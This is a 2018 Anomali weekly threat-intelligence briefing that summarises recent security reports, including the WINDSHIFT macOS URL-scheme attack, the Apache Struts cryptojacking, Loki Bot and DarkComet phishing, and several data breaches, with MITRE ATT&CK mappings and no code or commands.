September 4, 2018
-
Anomali Threat Research
,

Weekly Threat Briefing: Remote Mac Exploitation via Custom URL Schemes

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discuss the following threats: <strong>Anonymous, Apache Struts vulnerability, BusyGasper, Cobalt Gang, DarkComet, DDoS, Loki Bot, Spear phishing, </strong>and<strong> WINDSHIFT APT.</strong> The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h1 id="trendingthreats">Trending Threats</h1><p><a href="https://objective-see.com/blog/blog_0x38.html" target="_blank"><b>Remote Mac Exploitation Via Custom URL Schemes</b></a> (<i>August 30, 2018</i>)<br/> An obscure Advanced Persistent Threat (APT) called WINDSHIFT has been seen exploiting a flaw in macOS to target government institutions in the Middle East in what appears to be the 1st-stage of a 2nd-stage cyber campaign. This 1st-stage attack is intended to gain initial access into a fully patched macOS system to pave the way for the 2nd-stage attack in the future. The malware exploits custom URL schemes in the Safari browser to remotely infect macOS targets. This requires a minimal amount of user interaction, but this can be "influenced" by the APT group as needed. This 1st-stage attack takes advantage of the way macOS registers document handlers and custom URL schemes to automatically unzip a malicious attachment sent via phishing emails in the Safari browser. Once the attachment is automatically unzipped, a malicious application in the attachment is in the filesystem and triggers the registration of a custom URL scheme handler. The malware can then load the custom URL on the user’s computer so the threat actor can then have access to a system.<br/> <a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/remote-mac-exploitation-via-custom-url-schemes/2878" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947281">[MITRE ATT&amp;CK] Launch Daemon (T1160)</a></p><p><a href="https://asert.arbornetworks.com/double-the-infection-double-the-fun/" target="_blank"><b>Double The Infection, Double The Fun</b></a> (<i>August 30, 2018</i>)<br/> The threat group, Cobalt Gang (also known as TEMP.Metastrike), is suspected to be engaging in attacks against financial organizations in several countries. Researchers at ASERT have observed a new campaign targeting institutions in Romania and Russia utilizing spear phishing emails pretending to be from financial vendors or partners to trick users into opening the malicious attachments in the emails. The malicious attachments are either a Word document that contains obfuscated VBA scripts or a binary with a JPG extension. Both send information to command and control (C2) servers that are owned by Cobalt Group.<br/> <a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/double-the-infection-double-the-fun/2879" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947197">[MITRE ATT&amp;CK] CMSTP (T1191)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.infosecurity-magazine.com/news/crypto-jackers-exploit-critical/" target="_blank"><b>Cryptojackers Exploit Critical Apache Struts Flaw</b></a> (<i>August 30, 2018</i>)<br/> Security experts from Volexity have recently seen a critical Apache Strut vulnerability being exploited in the wild to install a popular cryptocurrency miner on targeted machines. The vulnerability, which is known as CVE-2018-11776, comes from an improper validation of namespace input data, and threat actors have already exploited this to install a CNRig cryptocurrency miner on machines.<br/> <b><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank">Click here for </a><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank">Anomali</a><a href="https://forum.anomali.com/t/cryptojackers-exploit-critical-apache-struts-flaw/2880" target="_blank"> recommendation</a><br/> MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947209">[MITRE ATT&amp;CK] Third-party Software (T1072)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/" target="_blank"><b>Anonymous Catalonia Claims DDoS Attack On Bank of Spain Website</b></a> (<i>August 30, 2018</i>)<br/> The hacktivist group, Anonymous Catalonia claimed a Distributed Denial of Service (DDoS) attack on Banco de España which forced the bank’s website to be offline and unusable for two days. The group claimed the attack via Twitter using the hashtag “TangoDown” to indicate the bank’s hosting server was down globally. The hacktivist group targeted the bank, amongst others, to protest the arrests of Catalan leaders who took part in the illegal Independence referendum last year. Banco de España stated that while their website was down, none of their normal functionalities were impacted. This is a continuation of attacks on various Spanish legal entities following the unsuccessful referendum last year and the so-called “hurting of Catalan people” that this group claims the government is responsible for.<br/> <a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/anonymous-catalonia-claims-ddos-attack-on-bank-of-spain-website/2881" target="_blank"><b> recommendation</b></a></p><p><a href="https://nakedsecurity.sophos.com/2018/08/30/air-canada-resets-1-7-million-accounts-after-app-breach/" target="_blank"><b>Air Canada Resets 1.7 Million Accounts After App Breach</b></a> (<i>August 30, 2018</i>)<br/> Air Canada issued password resets to over 1.7 million customers using its mobile application following a data breach that affected 20,000 accounts. Unusual login behavior was detected between August 22 and 24, 2018, and the airline proceeded to block further access. The data compromised includes: names, email addresses, telephone numbers, and Air Canada Aeroplan account numbers. The other data compromised in this breach, which is more worrying, includes passport numbers, NEXUS numbers (allows for quicker access over some borders), traveler numbers, gender, date of birth, nationality, passport expiry date, country of issuance, and country of residence. The airline reports that credit card numbers were encrypted and thus safe from the breach.<br/> <a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/air-canada-resets-1-7-million-accounts-after-app-breach/2882" target="_blank"><b> recommendation</b></a></p><p><a href="https://securelist.com/busygasper-the-unfriendly-spy/87627/" target="_blank"><b>BusyGasper – The Unfriendly Spy </b></a> (<i>August 29, 2018</i>)<br/> Security researchers from Kaspersky Lab uncovered a new family of spyware, dubbed “BusyGasper,” that targets Android devices. Whilst the malware is not too sophisticated, it does have a broad range of commands that it can do, including keylogging every tap, exfiltrate data from messaging applications such as WhatsApp and Viber, and bypasses the Doze battery saver. The malware can deliver payloads from the command and control (C2) server which originates from a free Russian web hosting service called Ucoz. This malware is more unusual than most because it appears that the initial attack vector requires the threat actor to physically install the malware on the target’s device, meaning the threat actor needs to actually get a hold of the device somehow. Due to the close physical proximity to the target device, researchers have only seen fewer than ten victims and they are all located within Russia. Despite the threat actors gaining access to the victim’s bank account information, it does not appear that the intent of the attack is financially-driven.<br/> <a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/busygasper-the-unfriendly-spy/2883" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" target="_blank"><b>Loki Bot: On A Hunt For Corporate Passwords </b></a> (<i>August 29, 2018</i>)<br/> Researchers from Kaspersky Labs have discovered a malspam campaign pushing the Loki Bot malware through phishing emails. The emails have targeted corporate businesses using three possible types of messages to try to get a target to open the email and malicious attachment. The threat actors either created fake emails from real companies (usually related to money payments/invoices or shipping statements), fake emails containing financial documents to be looked at, or fake emails containing false order statements or offers for providing services. If a target opens the malicious attachment, the Loki Bot malware then can assist in the threat actors gaining access to intellectual property, databases, bank account information, system credentials and more.<br/> <a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/loki-bot-on-a-hunt-for-corporate-passwords/2884" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://latesthackingnews.com/2018/08/29/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/" target="_blank"><b>Microsoft Windows Zero-Day Vulnerability Is Disclosed On Twitter </b></a> (<i>August 29, 2018</i>)<br/> A Twitter user named “SandboxEscaper” disclosed a zero-day vulnerability in Microsoft Windows. This vulnerability escalates a flaw in the operating system’s task scheduler’s Advanced Local Procedure Call (ALPC). This vulnerability allows for a threat actor to obtain system privileges and currently has no known workarounds for the vulnerability. Microsoft released a statement that it will release a patch for it next month. SandboxEscaper attempted to sell the vulnerability on Reddit, but the posts were removed, though it is unclear whether a sale was made before the removal of the posts.<br/> <a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/microsoft-windows-zero-day-vulnerability-is-disclosed-on-twitter/2885" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947233">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation (T1068)</a></p><p><a href="https://www.theregister.co.uk/2018/08/29/android_external_storage_man_in_the_disk/" target="_blank"><b>We're All Sick Of Fortnite, But The Flaw Found In Its Downloader Is The Latest Way To Attack Android</b></a> (<i>August 29, 2018</i>)<br/> The Android version of popular game, Fortnite, has been discovered to contain a vulnerability that could allow for a “man-in-the-disk” attack. This type of attack works by using the ability to read/write data to external storage to gain access to files in the external storage and modify them with malicious data. For the Android version of Fortnite, users are required to download the game through a helper application which is then supposed to download the game file for the device. A threat actor can use “man-in-the-disk” to get the user to download a malicious “helper application” instead, allowing the threat actor access to the device.<br/> <a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/were-all-sick-of-fortnite-but-the-flaw-found-in-its-downloader-is-the-latest-way-to-attack-android/2886" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947134">[MITRE ATT&amp;CK] Replication Through Removable Media (T1091)</a> | <a href="https://ui.threatstream.com/ttp/947264">[MITRE ATT&amp;CK] Hardware Additions (T1200)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/" target="_blank"><b>Beware Of Fake "Shipping Docs" Malspam Pushing The DarkComet RAT </b></a> (<i>August 28, 2018</i>)<br/> Security researcher Vishal Thakur has discovered a malware campaign that sends emails pretending to be related to a shipment notice for the target which contain a malicious attachment. The attachment appears as shipping document that is awaiting to be opened, read through, and approved by the target. The attachment appears as a .z file and will install the DarkComet RAT. The attachment, if opened, contains a DarkComet Remote Access Trojan (RAT). DarkComet then allows for threat actors to obtain logs of the infected machine’s keystrokes, application use, and take screenshots, amongst other things.<br/> <a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/beware-of-fake-shipping-docs-malspam-pushing-the-darkcomet-rat/2887" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools (T1219)</a></p><p><a href="https://research.checkpoint.com/ceidpagelock-a-chinese-rootkit/" target="_blank"><b>CeidPageLock: A Chinese RootKit </b></a> (<i>August 28, 2018</i>)<br/> A new version of the browser-hijacking rootkit called “CEIDPageLock” has been found being distributed by the RIG Exploit kit by Check Point researchers. CEIDPageLock attempts to manipulate a user’s browser and turn their homepage to a Chinese web directory, 2435.com. This new version of the malware monitors user’s browsing data and replaces the content of popular Chinese sites with the fake homepage of 2345.com. Threat actors can then monitor what sites victims go to and how long they are on each website to potentially lead targeted advertisement campaigns or sell that information to other companies. Most of the victims originated in China, however, other victims located in the UK, Taiwan, Hong Kong, the US, Denmark, and Japan were also observed. CEIDPageLock is most likely distributed via the RIG’s landing page which exploits a browser vulnerability to gain code execution. From there, the malware dropper is downloaded then extracts the driver from within itself and saves it in the “\Windows\Temp” directory with the filename “houzi.sys.” The dropper then starts the malicious 32-bit driver that connects to the command and control (C2) hard-coded domains to download the specific 2345.com homepage configuration. This version of CEIDPageLock has VMProtect, which makes analysis and unpacking difficult and also redirects victims to the specific homepage when they attempt to access specific Chinese websites.<br/> <a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/ceidpagelock-a-chinese-rootkit/2888" target="_blank"><b> recommendation</b></a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947092">[MITRE ATT&amp;CK] Rootkit (T1014)</a> | <a href="https://ui.threatstream.com/ttp/947181">[MITRE ATT&amp;CK] Kernel Modules and Extensions (T1215)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking (T1179)</a></p><p><a href="https://techcrunch.com/2018/08/27/abbyy-leaked-203000-sensitive-customer-documents-in-server-lapse/" target="_blank"><b>Abbyy Leaked 203,000 Sensitive Customer Documents In Server Lapse </b></a> (<i>August 27, 2018</i>)<br/> The maker of an optical recognition software, Abbyy, suffered a breach of sensitive customer data because of a database server that was left unsecured without a password on the Internet. The company’s MongoDB server was misconfigured in such a way that allowed for over 203,000 sensitive documents dating back to 2012 up to the present to be publicly accessible. The server was taken offline after it was privately disclosed within the company. According to the company, the breach only affected one customer and files involving commercial information and that customer has been notified, as well as Abbyy has taken corrective measures to the problem. They have not released information regarding if unauthorized users had accessed the database while it was public.<br/> <a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank"><b>Click here for </b></a><b><a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank">Anomali</a></b><a href="https://forum.anomali.com/t/abbyy-leaked-203-000-sensitive-customer-documents-in-server-lapse/2889" target="_blank"><b> recommendation</b></a></p></div><div id="observed-threats"><h1 id="observedthreats">Observed Threats</h1><p>This section includes the top threats observed from the Anomali Community user base as well as sensors deployed by Anomali Labs. A ThreatStream account is required to view this section. <a href="https://www.anomali.com/products/threatstream" target="_blank">Click here to request a trial</a>. Additional information regarding the threats discussed in this week’s Community Threat Briefing can be found below:</p></div><div id="threat_model"><div id="threat_model_ttp"><a href="https://ui.threatstream.com/ttp/59090" target="_blank">Spear Phishing</a><br/> Spear phishing is a tactic in which a threat actor targets a specific business, individual, or organization via email or another form of electronic communication while tricking the recipient into thinking the email originated from an authentic source. The objective of spear phishing is to gain an initial infection vector within a particular company’s or individual’s network. Threat actors will attempt to make the communication appear to originate from a source that the recipient would be familiar with and/or deem trustworthy. Spear phishing is used by all levels of threat actors, including Advanced Persistent Threat (APT) groups.</div><div id="threat_model_vulnerability"> </div></div></div>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.